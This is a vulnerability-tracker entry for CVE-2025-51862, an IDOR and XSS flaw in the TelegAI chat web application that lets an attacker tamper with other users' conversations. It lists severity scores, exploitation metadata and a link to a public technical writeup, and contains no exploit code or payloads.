CVE-2025-51862

MEDIUM

TelegAI <2025-05-26 - Info Disclosure

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-51862. PoCs published by Secsys-FDU.

AI-analyzed exploit summary The repository provides a detailed technical analysis of CVE-2025-51862, an IDOR vulnerability in TelegAI's chat component, allowing attackers to tamper with other users' conversations and inject malicious content. It includes a description of the attack vector, affected API, and potential impacts, but lacks functional exploit code.

Description

Insecure Direct Object Reference (IDOR) vulnerability in TelegAI (telegai.com) thru 2025-05-26 in its chat component. An attacker can exploit this IDOR to tamper other users' conversation. Additionally, malicious contents and XSS payloads can be injected, leading to phishing attack, user spoofing and account hijacking via XSS.

Exploits (1)

nomisec WRITEUP
by Secsys-FDU · poc
https://github.com/Secsys-FDU/CVE-2025-51862

The repository provides a detailed technical analysis of CVE-2025-51862, an IDOR vulnerability in TelegAI's chat component, allowing attackers to tamper with other users' conversations and inject malicious content. It includes a description of the attack vector, affected API, and potential impacts, but lacks functional exploit code.

Classification
Writeup 90%
Attack Type
Auth Bypass
Complexity
Moderate
Reliability
Theoretical
Target: TelegAI (web application)
No auth needed
Prerequisites: Access to a shared conversation link · Knowledge of victim's profile_id
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (1)

Core 1
Core References

Scores

CVSS v3 6.1
EPSS 0.0022
EPSS Percentile 12.9%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable no
Technical Impact partial

Details

CWE
CWE-79
Status published
Published Jul 22, 2025
Tracked Since Feb 18, 2026